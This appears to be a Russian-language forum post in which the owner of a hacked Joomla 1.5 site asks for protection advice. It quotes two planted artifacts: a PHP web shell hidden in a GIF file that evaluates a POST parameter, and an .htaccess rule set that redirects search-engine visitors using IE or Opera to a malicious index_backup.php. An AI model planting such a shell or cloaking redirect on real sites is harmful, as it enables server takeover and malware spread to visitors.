Всем привет! Сайт на Joomla 1.5, постоянно подвергался следующей атаке.
В папку images заливается gif-файл c кодом
GIF89a1
<?php eval(stripslashes(@$_POST[(chr(112).chr(49))]));?>
Затем в другой произвольной папке создавался php-файл с вирусом и выполнялся. Его я не сохранил..
Полазив по инету нашел подсказку что можно через htaccess сделать так чтобы залитый файл не исполнялся а просто выводился в браузер или давался на скачку при обращении к нему. Проделал данную операцию оданко это не спасло и...
Настал немного черный день, потому что следующая атака оказалась совсем негуманной, в результате которой Google и Яндекс обозвали сайт распространителем вируса и браузеры стали выдавать warning при попытке захода на него.
Атака была похожей только теперь во все каталоги был прописан файл .htaccess следующего содержания
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
И соответственно в некоторых директориях появился файл index_backup.php, который я, к сожалению, не сохранил.
В сути проникновения разбираться не стал (скорее всего она была похожей), так как решил поскорее залить чистую версию сайта и убрать ограничения из поисковиков.
Кто что может посоветовать по защите сайта от дальнейших проникновений? И что это было?
И спасет ли переход на свежую версию Joomla! ?
Учитывая, что атаки могли были направлены именно на выбивание сайта из поиска и понижение его позиций в выдаче, возможно ли как-то идентифицировать взломщика? И какие вообще меры можно при успешной идентификации применить?
09.03.2019, 11:06:54